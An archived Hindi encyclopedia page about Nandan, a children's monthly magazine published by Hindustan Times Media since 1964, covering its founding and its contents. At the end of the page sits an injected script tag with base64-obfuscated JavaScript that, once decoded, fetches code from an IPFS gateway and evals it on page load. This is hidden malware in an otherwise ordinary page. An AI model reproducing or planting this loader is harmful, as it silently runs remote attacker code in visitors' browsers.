Refresh

This website bharatdiscovery.org/india/%E0%A4%A8%E0%A4%82%E0%A4%A6%E0%A4%A8_(%E0%A4%AA%E0%A4%A4%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%95%E0%A4%BE) is currently offline. Cloudflare\'s Always Online™ shows a snapshot of this web page from the Internet Archive\'s Wayback Machine. To check for the live version, click Refresh.

नंदन (पत्रिका)

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:नेविगेशन, खोजें
नंदन का आवरण पृष्ठ

नंदन बच्चों की एक हिन्दी मासिक पत्रिका है। नंदन, 'हिन्दुस्तान टाइम्स मीडिया' की मासिक बच्चों की पत्रिका है जो 47 साल से अधिक पुरानी है।

प्रकाशन

पत्रिका को नवम्बर 1964 में भारत के प्रथम प्रधानमंत्री पंडित जवाहरलाल नेहरू में प्रारम्भ किया गया था। नंदन का पहला अंक पूर्व प्रधानमंत्री पंडित जवाहर लाल नेहरू को समर्पित किया गया था। प्रमुख रूप से नंदन की कहानियाँ पौराणिक एवं परी कथाएँ होती थी, पर समय के साथ एवं अपने बाल पाठकों की बदलती रुचि को ध्यान रख कर नंदन में समकालीन विषयों एवं प्रसिद्ध जीवनियों पर कहानियाँ प्रकाशित करना प्रारम्भ कर दिया। नंदन पत्रिका की 10,000 से भी ज्यादा कहानियाँ प्रकाशित हो चुकी हैं।[1]

विषय

वर्षों से यह अपने पाठकों के साथ एक मजबूत रिश्ता विकसित किये हुए है और भारत और विदेशों में बच्चों और उनके परिवारों के बीच बेहद लोकप्रिय है। बच्चों की अन्य पत्रिकाओं से अलग नंदन पारंपरिक और आधुनिक कहानियों, कविताओं, इंटरैक्टिव स्तंभ, रोचक तथ्य और कई शिक्षाप्रद स्तंभ, होने के कारण नंदन हमारे बच्चों के सम्पूर्ण विकास के लिए अग्रणी है। यह हमारे सांस्कृतिक लोकाचार का हमारे बच्चों में विकास करता रहता है, उन्हें विश्व भर की नवीनतम घटनाओं से अवगत कराने और बच्चों के मनोरंजन की गतिविधियों में संलग्न है, जिससे बच्चों का ज्ञान एवं व्यवहार एक सकारात्मक राह की ओर आकार लेता है।

टीका टिप्पणी और संदर्भ

  1. Our Brands (अंग्रेज़ी)। । अभिगमन तिथि: 5 सितम्बर, 2012।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>